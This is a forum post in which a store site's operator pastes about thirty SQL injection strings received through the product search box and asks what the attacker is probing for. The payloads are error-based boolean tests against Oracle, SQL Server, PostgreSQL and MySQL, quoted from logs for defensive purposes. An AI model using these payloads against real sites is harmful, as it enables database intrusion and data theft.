Hi Guys,
Since early this morning, we have been receiving the following search queries from our stores. I understand this is SQL injection; I have added a maximum-length check and logic to detect SQL injection and prevent it from reaching the SQL server.
But I just wanted to know: what is the person running these searches trying to learn or probe? Is it safe to ignore?
The search terms are given below. "Enter Model Number or Cartridge Code" is the default placeholder text of our search box. The source IP address appears to be German.
Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170
Enter Model Number or Cartridge Code%' AND 4911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(104)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4911=4911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Enter Model Number or Cartridge Code%' AND 9729=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113)||(SELECT (CASE WHEN (9729=9729) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Enter Model Number or Cartridge Code%' AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP
Enter Model Number or Cartridge Code') AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND ('SdsF'='SdsF
Enter Model Number or Cartridge Code' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'cvvd'='cvvd
Enter Model Number or Cartridge Code' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'zIAo'='zIAo
Enter Model Number or Cartridge Code') AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND ('lukU'='lukU
Enter Model Number or Cartridge Code' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND 'gvys'='gvys
Enter Model Number or Cartridge Code) AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND (9658=9658
Enter Model Number or Cartridge Code) AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND (2502=2502
Enter Model Number or Cartridge Code%' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code%' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND (SELECT 6528 FROM(SELECT COUNT(*),CONCAT(0x7178696e71,(SELECT (CASE WHEN (6528=6528) THEN 1 ELSE 0 END)),0x71776a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND (SELECT 9422 FROM(SELECT COUNT(*),CONCAT(0x7171686a71,(SELECT (CASE WHEN (9422=9422) THEN 1 ELSE 0 END)),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ
Enter Model Number or Cartridge Code' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND 'CJnu'='CJnu
Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))-- PYgY
Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))-- TXpN
Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167
Enter Model Number or Cartridge Code%' AND 9841=CAST((CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113))||(SELECT (CASE WHEN (9841=9841) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND '%'='
Enter Model Number or Cartridge Code%' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND '%'='
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))
Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))
Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))
Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa
Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)